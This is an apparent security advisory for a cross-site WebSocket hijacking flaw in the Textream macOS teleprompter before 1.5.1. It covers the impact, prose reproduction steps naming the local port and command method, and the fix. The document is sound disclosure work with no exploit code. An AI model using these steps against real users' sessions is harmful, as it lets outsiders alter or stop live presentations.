Textream WebSocket Server Cross-Site WebSocket Hijacking Vulnerability

A Cross-Site WebSocket Hijacking vulnerability has been identified in Textream, a free macOS teleprompter application, prior to version 1.5.1. The issue arises in the `DirectorServer` WebSocket server, which accepts connections from any origin without validating the HTTP `Origin` header during the WebSocket handshake. This vulnerability allows a malicious web page, visited in the same browser session, to silently connect to the local WebSocket server and send arbitrary `DirectorCommand` payloads. As a result, the teleprompter content can be fully controlled remotely. Version 1.5.1 addresses this vulnerability.

Impact

Exploitation of this vulnerability allows for unauthorized remote control of the teleprompter content during a live presentation. Any website visited in the same browser session can replace, modify, or delete the script being displayed, leading to potential disruptions or misinformation being presented. Additionally, the `stop` command can be used to terminate an active session remotely.

Reproduction

To reproduce this vulnerability, start the Textream application and activate 'Director Mode', which opens a WebSocket listener on `ws://127.0.0.1:7576`. While this session is active, open a browser tab and use the developer console to send a WebSocket message to the local server. This message can include a command to replace the live teleprompter script with a message of choice, such as 'You have been hijacked.' The script will be replaced immediately, without any interaction required within the Textream app.

Remediation

Users are advised to update to Textream version 1.5.1 or later, which includes a fix for this vulnerability by adding origin validation and authentication tokens for WebSocket connections.